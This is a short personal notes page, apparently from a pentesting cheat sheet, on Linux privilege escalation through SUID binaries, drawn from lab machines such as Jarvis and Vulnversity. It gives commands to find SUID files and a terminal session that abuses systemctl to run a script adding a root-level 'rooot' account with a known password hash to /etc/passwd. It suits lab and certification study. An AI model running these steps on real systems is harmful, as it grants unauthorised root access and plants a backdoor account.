Comment on page
SUID wins!

SUID- it runs the file with the permissions of the file owner. (if the file owner is root, we can run it as root) 
Find: 
​
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
Vulnversity (Privilege Escalation)
Progressive OSCP
OR 
create a service that executes /dev/shm/root.sh:
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
created /dev/shm/root.sh which echoes:
rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash
to /etc/passwd to enable us to su as root with the credentials rooot : AAAA. (Check Ghoul).

pepper@jarvis:/dev/shm$ nano root.service
pepper@jarvis:/dev/shm$ cat root.service
[Unit]
Description=pwned
​
[Service]
ExecStart=/dev/shm/root.sh
​
[Install]
WantedBy=multi-user.target
pepper@jarvis:/dev/shm$ nano root.sh
pepper@jarvis:/dev/shm$ chmod +x root.sh
pepper@jarvis:/dev/shm$ cat root.sh
#!/bin/bash
echo 'rooot:gDlPrjU6SWeKo:0:0:root:/root:/bin/bash' >> /etc/passwd
pepper@jarvis:/dev/shm$ 
I enabled the service and started it:
pepper@jarvis:/dev/shm$ systemctl enable /dev/shm/root.service
Created symlink /etc/systemd/system/multi-user.target.wants/root.service -> /dev/shm/root.service.
Created symlink /etc/systemd/system/root.service -> /dev/shm/root.service.
pepper@jarvis:/dev/shm$ systemctl start root.service
pepper@jarvis:/dev/shm$
Check /etc/passwd
and su rooot with the creds
no_root_squash!
bin/bash
Last modified 1yr ago